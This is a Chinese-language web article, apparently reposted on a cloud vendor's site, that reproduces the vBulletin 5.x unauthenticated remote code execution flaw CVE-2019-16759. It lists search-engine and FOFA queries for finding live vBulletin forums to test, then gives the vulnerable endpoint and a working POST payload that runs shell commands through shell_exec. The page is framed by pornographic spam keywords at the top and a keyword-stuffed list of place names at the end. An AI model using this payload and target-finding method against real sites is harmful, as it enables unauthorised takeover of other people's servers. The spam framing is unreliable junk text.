91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

vBulletin 5.x未授權RCE漏洞CVE-2019-16759復現分析

發布時間:2021-12-20 18:10:28 來源:億速云 閱讀:357 作者:柒染 欄目:大數據

vBulletin 5.x未授權RCE漏洞CVE-2019-16759復現分析,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。


0x00 簡介

vBulletin是一個收費低廉但強大的建站BBS(論壇)CMS,該CMS國外大量論壇使用,中國國內少許網站使用。近日,vBulletin 5.x爆出一個前臺遠程代碼執行漏洞,無需登錄即可觸發。該論壇程序在國外的國外的用戶量就類似dz論壇在國內的用戶量。

0x01 漏洞概述

漏洞通過請求ajax/render/widget_php進行模板注入觸發代碼執行。

0x02 影響范圍

5.0.0 <= vBulletin <=5.5.4

0x03 環境搭建

自行搭建需要付費,因此這里使用google語法和FOFA查找

google語法:

site:*.vbulletin.net

Powered by vBulletin

FOFA:

content="vBulletin"
app="vBulletin"

在線靶場獲取方式

轉發本文至朋友圈并截圖發至公眾號內即可

0x04 漏洞利用

進入如下vBulletin論壇

vBulletin 5.x未授權RCE漏洞CVE-2019-16759復現分析

訪問/index.php?routestring=ajax/render/widget_php會顯示以下結果

vBulletin 5.x未授權RCE漏洞CVE-2019-16759復現分析

然后POST如下數據即可執行命令whoami

widgetConfig[code] = echo shell_exec('whoami'); exit;

vBulletin 5.x未授權RCE漏洞CVE-2019-16759復現分析

0x05 修復方式

安全更新補丁下載:

http://members.vbulletin.com/patches.php

關于vBulletin 5.x未授權RCE漏洞CVE-2019-16759復現分析問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

翁源县| 勃利县| 奉化市| 家居| 商城县| 布尔津县| 仁寿县| 嘉禾县| 龙州县| 巴中市| 工布江达县| 扶风县| 荆州市| 郸城县| 高平市| 陕西省| 安徽省| 当雄县| 普宁市| 吉首市| 鄄城县| 霞浦县| 阿城市| 濮阳县| 镇原县| 盐山县| 大宁县| 简阳市| 芦溪县| 当阳市| 沂南县| 黔江区| 柘城县| 蚌埠市| 天镇县| 武乡县| 江城| 绥德县| 千阳县| 儋州市| 岳阳县|